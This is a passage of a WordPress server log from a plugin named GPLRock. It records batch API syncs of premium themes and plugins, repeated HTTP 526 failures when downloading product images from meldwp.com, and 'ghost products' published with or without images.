GPLRock: Image download failed for product foodsy-wordpress-food-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodsy---wordpress-food-blog-theme-31553.webp for product foodsy-wordpress-food-blog-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:40 UTC] GPLRock WARNING: Image download failed for product foodsy-wordpress-food-blog-theme. URL: https://meldwp.com/wp-content/uploads/foodsy---wordpress-food-blog-theme-31553.webp [08-Mar-2026 22:28:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodsy-wordpress-food-blog-theme [08-Mar-2026 22:28:41 UTC] GPLRock: Image download failed for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:44 UTC] GPLRock: Image download failed for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doccure---html-angular-vue--laravel-clinic--doctor-appointment-booking-template--21369.webp for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:46 UTC] GPLRock: Image download failed for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:48 UTC] GPLRock: Image download failed for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doccure---html-angular-vue--laravel-clinic--doctor-appointment-booking-template--21369.webp for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:28:50 UTC] GPLRock WARNING: Image download failed for product doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard. URL: https://meldwp.com/wp-content/uploads/doccure---html-angular-vue--laravel-clinic--doctor-appointment-booking-template--21369.webp [08-Mar-2026 22:28:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doccure-html-angular-vue-laravel-clinic-doctor-appointment-booking-template-admin-dashboard [08-Mar-2026 22:28:51 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2100, Total: 300/9737 [08-Mar-2026 22:28:52 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:28:53 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:28:54 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2200, Total: 300/9737 [08-Mar-2026 22:28:55 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-master (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:56 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:28:56 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:28:56 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:28:56 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2300, Total: 400/9737 [08-Mar-2026 22:28:57 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-master (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:28:57 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:28:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-master-15364.webp for product woocommerce-variation-swatches-master after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:00 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-master (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:02 UTC] GPLRock: Image download failed for product woocommerce-variation-swatches-master (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:03 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:29:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-master-15364.webp for product woocommerce-variation-swatches-master after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:04 UTC] GPLRock WARNING: Image download failed for product woocommerce-variation-swatches-master. URL: https://meldwp.com/wp-content/uploads/woocommerce-variation-swatches-master-15364.webp [08-Mar-2026 22:29:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-variation-swatches-master [08-Mar-2026 22:29:04 UTC] GPLRock: Image downloaded successfully for product woodelivery-delivery-pickup-date-time-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e0087b3.webp [08-Mar-2026 22:29:04 UTC] GPLRock: Using pre-downloaded image for product woodelivery-delivery-pickup-date-time-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e0087b3.webp [08-Mar-2026 22:29:04 UTC] GPLRock: Ghost product published with image - Product ID: woodelivery-delivery-pickup-date-time-for-woocommerce [08-Mar-2026 22:29:04 UTC] GPLRock: Image download failed for product privatecontent-wordpress-bundle-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:06 UTC] GPLRock: Image download failed for product privatecontent-wordpress-bundle-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/privatecontent---wordpress-bundle-pack-22033.webp for product privatecontent-wordpress-bundle-pack after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:08 UTC] GPLRock: Image download failed for product privatecontent-wordpress-bundle-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:11 UTC] GPLRock: Image download failed for product privatecontent-wordpress-bundle-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/privatecontent---wordpress-bundle-pack-22033.webp for product privatecontent-wordpress-bundle-pack after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:13 UTC] GPLRock WARNING: Image download failed for product privatecontent-wordpress-bundle-pack. URL: https://meldwp.com/wp-content/uploads/privatecontent---wordpress-bundle-pack-22033.webp [08-Mar-2026 22:29:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: privatecontent-wordpress-bundle-pack [08-Mar-2026 22:29:15 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gooey-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:17 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gooey-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gooey-menu-26852.webp for product visual-composer-ultimate-gooey-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:19 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gooey-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:21 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gooey-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gooey-menu-26852.webp for product visual-composer-ultimate-gooey-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:23 UTC] GPLRock WARNING: Image download failed for product visual-composer-ultimate-gooey-menu. URL: https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gooey-menu-26852.webp [08-Mar-2026 22:29:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-ultimate-gooey-menu [08-Mar-2026 22:29:23 UTC] GPLRock: Image download failed for product supercache-module-for-foodomaa (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:26 UTC] GPLRock: Image download failed for product supercache-module-for-foodomaa (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supercache-module-for-foodomaa-21857.webp for product supercache-module-for-foodomaa after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:28 UTC] GPLRock: Image download failed for product supercache-module-for-foodomaa (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:30 UTC] GPLRock: Image download failed for product supercache-module-for-foodomaa (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supercache-module-for-foodomaa-21857.webp for product supercache-module-for-foodomaa after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:32 UTC] GPLRock WARNING: Image download failed for product supercache-module-for-foodomaa. URL: https://meldwp.com/wp-content/uploads/supercache-module-for-foodomaa-21857.webp [08-Mar-2026 22:29:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: supercache-module-for-foodomaa [08-Mar-2026 22:29:32 UTC] GPLRock: Image download failed for product advanced-grid-blog-layout-design (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:34 UTC] GPLRock: Image download failed for product advanced-grid-blog-layout-design (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-grid-blog-layout-design-19687.webp for product advanced-grid-blog-layout-design after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:37 UTC] GPLRock: Image download failed for product advanced-grid-blog-layout-design (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:39 UTC] GPLRock: Image download failed for product advanced-grid-blog-layout-design (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-grid-blog-layout-design-19687.webp for product advanced-grid-blog-layout-design after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:41 UTC] GPLRock WARNING: Image download failed for product advanced-grid-blog-layout-design. URL: https://meldwp.com/wp-content/uploads/advanced-grid-blog-layout-design-19687.webp [08-Mar-2026 22:29:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-grid-blog-layout-design [08-Mar-2026 22:29:41 UTC] GPLRock: Image download failed for product wiloke-3d-parallax (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:43 UTC] GPLRock: Image download failed for product wiloke-3d-parallax (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-3d-parallax-29883.webp for product wiloke-3d-parallax after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:46 UTC] GPLRock: Image download failed for product wiloke-3d-parallax (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:48 UTC] GPLRock: Image download failed for product wiloke-3d-parallax (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-3d-parallax-29883.webp for product wiloke-3d-parallax after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:50 UTC] GPLRock WARNING: Image download failed for product wiloke-3d-parallax. URL: https://meldwp.com/wp-content/uploads/wiloke-3d-parallax-29883.webp [08-Mar-2026 22:29:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-3d-parallax [08-Mar-2026 22:29:51 UTC] GPLRock: Image download failed for product tax-exempt-by-user-user-role-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:53 UTC] GPLRock: Image download failed for product tax-exempt-by-user-user-role-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tax-exempt-by-user--user-role-for-woocommerce-18619.webp for product tax-exempt-by-user-user-role-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:55 UTC] GPLRock: Image download failed for product tax-exempt-by-user-user-role-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:57 UTC] GPLRock: Image download failed for product tax-exempt-by-user-user-role-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:29:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tax-exempt-by-user--user-role-for-woocommerce-18619.webp for product tax-exempt-by-user-user-role-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:29:59 UTC] GPLRock WARNING: Image download failed for product tax-exempt-by-user-user-role-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/tax-exempt-by-user--user-role-for-woocommerce-18619.webp [08-Mar-2026 22:29:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tax-exempt-by-user-user-role-for-woocommerce [08-Mar-2026 22:30:00 UTC] GPLRock: Image download failed for product fast-custom-grid-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:02 UTC] GPLRock: Image download failed for product fast-custom-grid-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fast--custom-grid---wordpress-plugin-3622.webp for product fast-custom-grid-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:04 UTC] GPLRock: Image download failed for product fast-custom-grid-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:06 UTC] GPLRock: Image download failed for product fast-custom-grid-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fast--custom-grid---wordpress-plugin-3622.webp for product fast-custom-grid-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:08 UTC] GPLRock WARNING: Image download failed for product fast-custom-grid-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/fast--custom-grid---wordpress-plugin-3622.webp [08-Mar-2026 22:30:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fast-custom-grid-wordpress-plugin [08-Mar-2026 22:30:09 UTC] GPLRock: Image downloaded successfully for product crawler-ticker-plugin-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4044a1d.webp [08-Mar-2026 22:30:09 UTC] GPLRock: Using pre-downloaded image for product crawler-ticker-plugin-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4044a1d.webp [08-Mar-2026 22:30:09 UTC] GPLRock: Ghost product published with image - Product ID: crawler-ticker-plugin-for-elementor [08-Mar-2026 22:30:09 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2200, Total: 300/9737 [08-Mar-2026 22:30:09 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:30:11 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:30:12 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2300, Total: 300/9737 [08-Mar-2026 22:30:12 UTC] GPLRock: Image download failed for product modern-video-reel-woocommerce-product-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:12 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:30:15 UTC] GPLRock: Image download failed for product modern-video-reel-woocommerce-product-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:15 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:30:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-woocommerce-product-addon-23421.webp for product modern-video-reel-woocommerce-product-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:17 UTC] GPLRock: Image download failed for product modern-video-reel-woocommerce-product-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:19 UTC] GPLRock: Image download failed for product modern-video-reel-woocommerce-product-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-video-reel-woocommerce-product-addon-23421.webp for product modern-video-reel-woocommerce-product-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:21 UTC] GPLRock WARNING: Image download failed for product modern-video-reel-woocommerce-product-addon. URL: https://meldwp.com/wp-content/uploads/modern-video-reel-woocommerce-product-addon-23421.webp [08-Mar-2026 22:30:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modern-video-reel-woocommerce-product-addon [08-Mar-2026 22:30:21 UTC] GPLRock: Image download failed for product treweler-marker-submission-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:23 UTC] GPLRock: Image download failed for product treweler-marker-submission-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/treweler-marker-submission-addon-30713.webp for product treweler-marker-submission-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:25 UTC] GPLRock: Image download failed for product treweler-marker-submission-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:27 UTC] GPLRock: Image download failed for product treweler-marker-submission-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/treweler-marker-submission-addon-30713.webp for product treweler-marker-submission-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:30 UTC] GPLRock WARNING: Image download failed for product treweler-marker-submission-addon. URL: https://meldwp.com/wp-content/uploads/treweler-marker-submission-addon-30713.webp [08-Mar-2026 22:30:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: treweler-marker-submission-addon [08-Mar-2026 22:30:30 UTC] GPLRock: Image downloaded successfully for product syno-woocommerce-product-carousel (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38ab7cf0.webp [08-Mar-2026 22:30:30 UTC] GPLRock: Using pre-downloaded image for product syno-woocommerce-product-carousel: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-38ab7cf0.webp [08-Mar-2026 22:30:30 UTC] GPLRock: Ghost product published with image - Product ID: syno-woocommerce-product-carousel [08-Mar-2026 22:30:30 UTC] GPLRock: Image download failed for product simpley-isotope-gallery-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:32 UTC] GPLRock: Image download failed for product simpley-isotope-gallery-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simpley---isotope-gallery-wordpress-plugin-21547.webp for product simpley-isotope-gallery-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:34 UTC] GPLRock: Image download failed for product simpley-isotope-gallery-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:36 UTC] GPLRock: Image download failed for product simpley-isotope-gallery-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simpley---isotope-gallery-wordpress-plugin-21547.webp for product simpley-isotope-gallery-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:38 UTC] GPLRock WARNING: Image download failed for product simpley-isotope-gallery-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/simpley---isotope-gallery-wordpress-plugin-21547.webp [08-Mar-2026 22:30:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simpley-isotope-gallery-wordpress-plugin [08-Mar-2026 22:30:39 UTC] GPLRock: Image download failed for product ht-slider-pro-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:41 UTC] GPLRock: Image download failed for product ht-slider-pro-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-slider-pro-for-elementor-18809.webp for product ht-slider-pro-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:44 UTC] GPLRock: Image download failed for product ht-slider-pro-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:46 UTC] GPLRock: Image download failed for product ht-slider-pro-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ht-slider-pro-for-elementor-18809.webp for product ht-slider-pro-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:48 UTC] GPLRock WARNING: Image download failed for product ht-slider-pro-for-elementor. URL: https://meldwp.com/wp-content/uploads/ht-slider-pro-for-elementor-18809.webp [08-Mar-2026 22:30:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ht-slider-pro-for-elementor [08-Mar-2026 22:30:48 UTC] GPLRock: Image download failed for product wordpress-expire-passwords (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:50 UTC] GPLRock: Image download failed for product wordpress-expire-passwords (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-expire-passwords-26364.webp for product wordpress-expire-passwords after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:52 UTC] GPLRock: Image download failed for product wordpress-expire-passwords (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:54 UTC] GPLRock: Image download failed for product wordpress-expire-passwords (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-expire-passwords-26364.webp for product wordpress-expire-passwords after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:30:57 UTC] GPLRock WARNING: Image download failed for product wordpress-expire-passwords. URL: https://meldwp.com/wp-content/uploads/wordpress-expire-passwords-26364.webp [08-Mar-2026 22:30:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-expire-passwords [08-Mar-2026 22:30:57 UTC] GPLRock: Image download failed for product herd-effect-fake-notifications-that-stimulate-user-action (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:30:59 UTC] GPLRock: Image download failed for product herd-effect-fake-notifications-that-stimulate-user-action (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/herd-effect---fake-notifications-that-stimulate-user-action-4652.webp for product herd-effect-fake-notifications-that-stimulate-user-action after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:01 UTC] GPLRock: Image download failed for product herd-effect-fake-notifications-that-stimulate-user-action (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:04 UTC] GPLRock: Image download failed for product herd-effect-fake-notifications-that-stimulate-user-action (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/herd-effect---fake-notifications-that-stimulate-user-action-4652.webp for product herd-effect-fake-notifications-that-stimulate-user-action after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:06 UTC] GPLRock WARNING: Image download failed for product herd-effect-fake-notifications-that-stimulate-user-action. URL: https://meldwp.com/wp-content/uploads/herd-effect---fake-notifications-that-stimulate-user-action-4652.webp [08-Mar-2026 22:31:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: herd-effect-fake-notifications-that-stimulate-user-action [08-Mar-2026 22:31:07 UTC] GPLRock: Image download failed for product logo-showcase-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:09 UTC] GPLRock: Image download failed for product logo-showcase-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase-for-elementor-wordpress-plugin-2984.webp for product logo-showcase-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:12 UTC] GPLRock: Image download failed for product logo-showcase-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:14 UTC] GPLRock: Image download failed for product logo-showcase-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase-for-elementor-wordpress-plugin-2984.webp for product logo-showcase-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:16 UTC] GPLRock WARNING: Image download failed for product logo-showcase-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/logo-showcase-for-elementor-wordpress-plugin-2984.webp [08-Mar-2026 22:31:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logo-showcase-for-elementor-wordpress-plugin [08-Mar-2026 22:31:16 UTC] GPLRock: Image downloaded successfully for product contact-form-7-emoji-reaction (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1c5baa0.webp [08-Mar-2026 22:31:16 UTC] GPLRock: Using pre-downloaded image for product contact-form-7-emoji-reaction: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d1c5baa0.webp [08-Mar-2026 22:31:16 UTC] GPLRock: Ghost product published with image - Product ID: contact-form-7-emoji-reaction [08-Mar-2026 22:31:17 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-recovery-email-sms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:19 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-recovery-email-sms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-recovery---email---sms-10043.webp for product woocommerce-abandoned-cart-recovery-email-sms after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:21 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-recovery-email-sms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:23 UTC] GPLRock: Image download failed for product woocommerce-abandoned-cart-recovery-email-sms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-recovery---email---sms-10043.webp for product woocommerce-abandoned-cart-recovery-email-sms after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:25 UTC] GPLRock WARNING: Image download failed for product woocommerce-abandoned-cart-recovery-email-sms. URL: https://meldwp.com/wp-content/uploads/woocommerce-abandoned-cart-recovery---email---sms-10043.webp [08-Mar-2026 22:31:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-abandoned-cart-recovery-email-sms [08-Mar-2026 22:31:25 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2300, Total: 300/9737 [08-Mar-2026 22:31:26 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:31:27 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:31:29 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2400, Total: 300/9737 [08-Mar-2026 22:31:29 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:31:29 UTC] GPLRock: Image download failed for product contact-form-7-email-add-on-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:30 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, 